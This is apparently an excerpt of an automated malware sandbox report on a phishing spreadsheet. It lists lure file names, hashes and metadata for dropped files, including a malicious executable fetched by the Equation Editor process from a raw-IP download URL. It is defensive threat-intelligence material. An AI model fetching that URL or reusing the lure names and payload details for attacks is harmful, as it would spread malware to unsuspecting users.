	Invoice-No.-6178324435_20210908.xlsb	Get hash	malicious	Browse	151.101.65.195
	Invoice-No.-9004_20210908.xlsb	Get hash	malicious	Browse	151.101.65.195
	FedAch wire confirmation 0032897710.xlsx	Get hash	malicious	Browse	151.101.65.195
	32352788.docx	Get hash	malicious	Browse	151.101.65.195
	1.msi	Get hash	malicious	Browse	151.101.65.195
	Updated+payment+approval.docx	Get hash	malicious	Browse	151.101.65.195
	FCL shipment .doc	Get hash	malicious	Browse	151.101.65.195
	Profoma Invoice.doc	Get hash	malicious	Browse	151.101.65.195

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	73728
Entropy (8bit):	6.0734640463696286
Encrypted:	false
SSDEEP:	1536:YoWKN83Xv+cALoeaAVFyj6Jr7MX0LzxIKt5M/NPpIsx:tWYIXmcA8FAu2JEXEtItI
MD5:	4399C694E88F3F32D22D91C6C4A173ED
SHA1:	FA50DF0581C5591073C6C48D5DFCF575FA272198
SHA-256:	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00
SHA-512:	EBAE4C3A8367F40B1742E7F0A62757AD37C802413C6C274C094520EBD580B475368D812AAE38B881C717BFE03C0AEE9088658D80D0DE4AA02BD9475065BD2260
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 51%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
IE Cache URL:	http://23.95.85.181/msn/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0......\.............@..........................0..............................................4...(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\172EEB4D.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CB70D9B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26C6B888.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AE58EE9.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F879DF.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\427D317C.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A496BE.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7788
Entropy (8bit):	5.5375562900215325
Encrypted:	false
SSDEEP:	96:w1kCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:weTrZuloOSGZboS/C93n+KuI
MD5:	3554C9613971029E8DCF260667989F95
SHA1:	8AC68A6DF51DD4046DB89E0FCE2E6E54ED138D02
SHA-256:	3BA6C0370AC4F6588B5809C32A98AEE353822EA1FBE448477BC804B25612C925
SHA-512:	F74B0F905F76731A442D0FBBE8E233D29299BCAD11C603C36D6B1972EB27C5DE84D1D63027E6C53824A3E6B92DF286D4B0A31F04BE0FDAFB1F19F5A295CBF692
Malicious:	false
Preview:	....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................U.6.).X.....A.d...................../.@./...p....\...../......./.../...p....../.<5.u..p....`.p.bU.$y.w..6...I......./....w..6.$.......d.......$./..^.p.....^.p(.6...6...V...I.-...../..<.w................<.9u.Z.v....X.n.....bU........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88F95BA7.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E7A67E3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812375908425657
Encrypted:	false
SSDEEP:	3072:O34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:A4UcLe0JOcXuunhqcS
MD5:	E4ED5B488F68649C13F0BCBA9C6CB1CA
SHA1:	7E3925CCD54B9A28E843BC8113104533E61088FE
SHA-256:	5B0FF882D89EFAE34BE4D64E18199A1B84449CD5955A2B8F9F07C27F0792EBA2
SHA-512:	C47C9D0178B7755C0BB3DAF75841FE882ABF25B9294F526AD7F6E1B9435C770CEE9A9EC46CEB2572F9B24101E80B5E063B884E5086ACE5DF130F2D5E438AC55A
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$........f.Y.@..%...............\|.......RQ$[\|...t...........`...$Q$[\|...t... ...Id.Yt...\|... .........c..d.Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...t........8.Y......c.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\995A17D6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4BD1561.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B84A6782.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8DA72E0.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA97BBEE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
